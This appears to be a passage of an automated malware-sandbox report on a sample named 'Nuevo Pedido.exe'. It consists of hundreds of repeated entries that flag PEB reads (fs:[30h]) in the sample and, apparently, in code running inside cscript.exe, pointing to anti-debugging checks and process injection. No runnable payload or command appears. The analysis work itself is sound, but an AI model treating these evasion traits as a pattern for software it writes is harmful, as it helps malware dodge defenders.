            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A8070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A8070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A88F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A346A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A6FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A88ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A6FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A71608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047ABC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048314FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048405AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048405AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04797D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047FA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04828DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0482FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047876E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0482FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04774F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04774F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04788794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04790050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04790050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04844015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04844015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047758EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04832073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04841074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048041E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA185 mov eax, dword ptr fs:[00000030h]
